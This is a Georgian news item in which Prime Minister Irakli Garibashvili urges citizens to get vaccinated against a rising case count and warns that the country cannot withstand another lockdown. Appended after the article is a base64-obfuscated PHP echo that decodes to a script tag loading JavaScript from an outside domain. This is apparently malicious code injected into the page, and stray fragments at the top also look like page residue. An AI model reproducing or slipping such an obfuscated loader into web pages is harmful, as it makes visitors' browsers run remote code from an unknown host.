celsiusi
ავერსი შნაიდერი
"თუ დღიურად 20-30 ათას აცრაზე არ ავედით, ძალიან გაგვიჭირდება", - ამ სიტყვებით მიმართავს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი მოქალაქეებს და ვაქცინაციისკენ მოუწოდებს.
 
„გთხოვთ, აქტიურად ჩავერთოთ ვაქცინაციის პროცესში. გუშინ ჩავატარეთ 11 ათასი აცრა, რაც არ არის საკმარისი. თუ არ ავედით დღეში 20-30 ათას აცრაზე, ძალიან გაგვიჭირდება. მაგალითად, დღეს უკვე გვქონდა 2 600 შემთხვევა და ეს არის საგანგაშო მაჩვენებელი. ძალიან ცუდი ტენდენციაა. ერთი მხრივ, გვინდა შევინარჩუნოთ ეკონომიკური ზრდის მაღალი მაჩვენებელი, მოქალაქეების კეთილდღეობა და მეორე მხრივ, მარტივი თხოვნა გვაქვს - გთხოვთ, აიცერით.
 
ძალიან მარტივია ამის გაკეთება. თუ მთავრობას მოქალაქეები არ დაუდგნენ მხარში, ისე როგორც ეს გასულ წელს მოხდა, მარტო ჩვენ ვერაფერს გავაკეთებთ. რაც გასაკეთებელი იყო ყველაფერი გავაკეთეთ, საჭიროზე მეტი ვაქცინა არის ქვეყანაში, კიდევ ველოდებით. მილიონნახევარი ვაქცინა უკვე გზაშია და რამდენიმე კვირის განმავლობაში ველოდებით“, - თქვა პრემიერმა.
 
მისივე განცხადებით, საქართველო კიდევ ერთ ჩაკეტვას ვეღარ გაუძლებს.
1720
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");